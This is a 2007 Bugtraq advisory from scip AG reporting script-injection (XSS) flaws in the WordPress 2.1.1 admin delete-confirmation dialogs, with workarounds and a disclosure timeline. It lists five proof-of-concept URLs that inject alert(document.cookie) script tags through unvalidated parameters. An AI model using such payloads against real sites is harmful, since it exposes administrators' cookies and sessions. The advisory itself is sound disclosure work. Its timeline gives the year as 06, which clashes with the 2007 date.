lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <45E449B9.6090902@scip.ch>
Date: Tue, 27 Feb 2007 16:09:45 +0100
From: Stefan Friedli <stfr@...p.ch>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.grok.org.uk, news@...uriteam.com,
	support@...unia.com
Subject: Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities

scip AG Vulnerability ID 2962 (02/27/2007)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962

I. INTRODUCTION

"WordPress is a state-of-the-art semantic personal publishing platform 
with a focus on aesthetics, web standards, and usability."
More information is available on the project web site at the following URL:

     http://www.wordpress.org

II. DESCRIPTION

Stefan Friedli found several vulnerabilities based on an advisory 
entitled "WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender" which 
described a lack of input validation when deleting posts that allows 
injection of arbitrary code. The vulnerability was reported on February, 
26th and is referenced in section VII.

Further to this vulnerability which was limited on manipulating the 
"post"-parameter, there are several other vulnerabilities which are very 
similar to the one mentioned above. Every operation that makes use of 
the common confirm-dialog is vulnerable for this type of attack.

Possible injection...

... when deleting posts as mentioned in Samenspenders advisory 
(unvalidated parameter: post, file: post.php)
http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting pages (unvalidated parameter: page, file: page.php)
http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting categories (unvalidated parameter: cat_ID, file: 
categories.php)
http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

IV. IMPACT

This list may not be exhaustive. It illustrated that the flaw with 
confirmation dialogs in Wordpress is not limited to the "Delete 
Post"-function. Fixing the validation of the post parameter as suggested 
by e.g. Secunia does not fix the problem and does not reduce the threat 
of cross-site-scripting or any other webbased exploitation.

V. DETECTION

This flaws can be detected by using any web browser.

VI. SOLUTION

Until these issues are patched, possible workarounds are manual fixing 
or the usage of a application level filter like mod_security for Apache.

VII. SOURCES

Samenspender - WordPress AdminPanel CSRF/XSS - 0day
http://seclists.org/bugtraq/2007/Feb/0494.html

scip AG - Security Consulting Information Process (german)
http://www.scip.ch

scip AG Vulnerability Database (german)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962

IX. DISCLOSURE TIMELINE

02/26/06 Release of "Delete Post"-Confirmation Vulnerability
02/27/06 Identification of further vulnerabilities
02/27/06 Immediated Release for informational purposes

IX. CREDITS

The vulnerabilities were discovered by Stefan Friedli.

     Stefan Friedli, scip AG, Zuerich, Switzerland
     stfr-at-scip.ch
     http://www.scip.ch

A2. LEGAL NOTICES

Copyright (c) 2007 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not 
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time 
of publishing based on currently available information. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect or 
consequential loss or damage from use of or reliance on this advisory.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.0.6

iQA/AwUBReRJv1J79Mw3xa1EEQJXagCdHOT7ib4I8XSqMsaUAKA8vaO8i8QAn2SS
oTWNsT+cOMwFq+XKsZqq6yJ/
=REO6
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ